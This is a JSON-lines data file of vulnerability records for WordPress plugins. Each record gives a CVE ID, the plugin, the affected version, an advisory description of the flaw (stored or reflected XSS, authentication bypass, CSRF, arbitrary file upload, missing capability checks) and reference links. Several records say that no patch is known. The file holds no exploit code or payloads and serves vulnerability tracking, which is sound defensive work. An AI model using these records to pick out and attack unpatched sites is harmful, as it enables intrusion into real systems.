{"CVE_ID":"CVE-2024-8267","slug":"radio-player","versionImpact":"2.0.78","description":"The Radio Player \u2013 Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute within the 'wp:radio-player' Gutenberg block in all versions up to, and including, 2.0.78 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49581614-14a8-4450-8f83-d8d22a3feee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49581614-14a8-4450-8f83-d8d22a3feee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radio-player\\\/trunk\\\/block\\\/class-block.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radio-player\\\/trunk\\\/block\\\/class-block.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radio-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radio-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/radio-player\\\/trunk\\\/block\\\/class-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/radio-player\\\/trunk\\\/block\\\/class-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9105","slug":"Ultimate_AI","versionImpact":"2.8.3","description":"The UltimateAI plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.8.3. This is due to insufficient verification on the user being supplied in the 'ultimate_ai_register_or_login_with_google' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2475643-a0b4-444a-a2c6-a5c45e90e1dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2475643-a0b4-444a-a2c6-a5c45e90e1dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12110","slug":"gold-addons-for-elementor","versionImpact":"1.3.2","description":"The Gold Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate() and deactivate() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate and deactivate licenses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gold-addons-for-elementor\\\/trunk\\\/includes\\\/admin\\\/class-ajax.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gold-addons-for-elementor\\\/trunk\\\/includes\\\/admin\\\/class-ajax.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12471","slug":"post-saint","versionImpact":"1.3.1","description":"The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-saint\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-saint\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc17284e-65ea-4e67-aba9-3475f0174657?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc17284e-65ea-4e67-aba9-3475f0174657?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13564","slug":"rife-elementor-extensions","versionImpact":"1.2.5","description":"The Rife Elementor Extensions & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Writing Effect Headline shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244081\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244081\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520555b4-35e8-4ec1-85b8-3a43b5209661?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520555b4-35e8-4ec1-85b8-3a43b5209661?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13615","slug":"socialsnap","versionImpact":"1.3.6","description":"The Social Share Buttons, Social Sharing Icons, Click to Tweet \u2014 Social Media Plugin by Social Snap WordPress plugin through 1.3.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11718","slug":"tarteaucitron-wp","versionImpact":"0.2.5","description":"The tarteaucitron-wp WordPress plugin before 0.3.0 allows author level and above users to add HTML into a post\/page, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02da3a49-20e4-4476-a78d-4c627994a90a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02da3a49-20e4-4476-a78d-4c627994a90a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46500","slug":"wp-auto-spinner","versionImpact":"3.25.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ValvePress Wordpress Auto Spinner allows Reflected XSS. This issue affects Wordpress Auto Spinner: from n\/a through 3.25.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-plugin-3-25-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-plugin-3-25-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7651","slug":"earnware-connect","versionImpact":"1.0.73","description":"The Earnware Connect plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ew_hasrole' shortcode in all versions up to, and including, 1.0.73 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/earnware-connect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/earnware-connect\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515557bf-da71-4076-89bb-ce970ea7befa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515557bf-da71-4076-89bb-ce970ea7befa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4576","slug":"easy-bootstrap-shortcodes","versionImpact":"4.5.4","description":"The Easy Bootstrap Shortcode WordPress plugin through 4.5.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d679e0e-891b-44f1-ac7f-a766e12956e0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d679e0e-891b-44f1-ac7f-a766e12956e0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0168","slug":"olevmedia-shortcodes","versionImpact":"1.1.9","description":"The Olevmedia Shortcodes WordPress plugin through 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e854efee-16fc-4379-9e66-d2883e01fb32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e854efee-16fc-4379-9e66-d2883e01fb32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1126","slug":"wp-fevents-book","versionImpact":"0.46","description":"The WP FEvents Book WordPress plugin through 0.46 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/87ce3c59-b234-47bf-abca-e690b53bbe82\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/87ce3c59-b234-47bf-abca-e690b53bbe82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4344","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 18.2. This is due to lacking mishandling the use of user IDs that is accessible by the visitor. This makes it possible for unauthenticated or authenticated attackers to access the information and privileges of other users, including 'guest users', in their own category (authenticated, or unauthenticated guests).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a7b2c9-5d8d-4b49-a47c-473e3288b563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a7b2c9-5d8d-4b49-a47c-473e3288b563?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4160","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.90","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.2.90 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L654\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L654\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2953379%40woo-pdf-invoice-builder%2Ftrunk&old=2951617%40woo-pdf-invoice-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2953379%40woo-pdf-invoice-builder%2Ftrunk&old=2951617%40woo-pdf-invoice-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a765360-8603-4ba1-a6db-dd0175ff3ddf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a765360-8603-4ba1-a6db-dd0175ff3ddf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5665","slug":"payment-forms-for-paystack","versionImpact":"3.4.1","description":"The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98f80608-f24f-4019-a757-de71cba9902f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98f80608-f24f-4019-a757-de71cba9902f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L958\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L986\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L986\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1013\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1194\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3756","slug":"mf-gig-calendar","versionImpact":"1.2.1","description":"The MF Gig Calendar WordPress plugin through 1.2.1 does not have CSRF checks in some places, which could allow attackers to make logged in Contributors and above delete arbitrary events via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28d0dca-2df1-4925-be81-dd9c46859c38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28d0dca-2df1-4925-be81-dd9c46859c38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1804","slug":"tutor-lms-migration-tool","versionImpact":"2.2.0","description":"The Tutor LMS \u2013 Migration Tool plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tutor_import_from_xml function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to import courses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a49a22e-d54e-461d-83c2-8278494eac13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a49a22e-d54e-461d-83c2-8278494eac13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L579\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L579\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8103","slug":"wp-category-dropdown","versionImpact":"1.8","description":"The WP Category Dropdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' parameter in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c959f9c-8ac4-4f59-9d93-8f96e650b02d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c959f9c-8ac4-4f59-9d93-8f96e650b02d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/category_dropdown_block.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/category_dropdown_block.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-category-dropdown\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-category-dropdown\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/build\\\/index.js#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/build\\\/index.js#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/index.js#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/index.js#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/edit.js#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/edit.js#L258\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9104","slug":"Ultimate_AI","versionImpact":"2.8.3","description":"The UltimateAI plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.8.3. This is due to the improper empty value check and a missing default activated value check in the 'ultimate_ai_change_pass' function. This makes it possible for unauthenticated attackers to reset the password of the first user, whose account is not yet activated or the first user who activated their account, who are subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3faf976d-0763-4e47-9bc3-18c791ec4487?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3faf976d-0763-4e47-9bc3-18c791ec4487?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12060","slug":"wp-media-optimizer-webp","versionImpact":"1.4.0","description":"The WP Media Optimizer (.webp) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018wpmowebp-css-resources\u2019 and 'wpmowebp-js-resources' parameters in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-optimizer-webp\\\/trunk\\\/wp-media-optimizer-webp.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-optimizer-webp\\\/trunk\\\/wp-media-optimizer-webp.php#L229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-optimizer-webp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-optimizer-webp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/183d1be9-4c05-4107-b039-3711034ef774?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/183d1be9-4c05-4107-b039-3711034ef774?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13570","slug":"stray-quotes","versionImpact":"1.9.9","description":"The Stray Random Quotes WordPress plugin through 1.9.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13580","slug":"xv-random-quotes","versionImpact":"1.40","description":"The XV Random Quotes WordPress plugin through 1.40 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30559","slug":"kento-wp-stats","versionImpact":"1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Kento WordPress Stats allows Stored XSS. This issue affects Kento WordPress Stats: from n\/a through 1.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/kento-wp-stats\\\/vulnerability\\\/wordpress-kento-wordpress-stats-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/kento-wp-stats\\\/vulnerability\\\/wordpress-kento-wordpress-stats-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
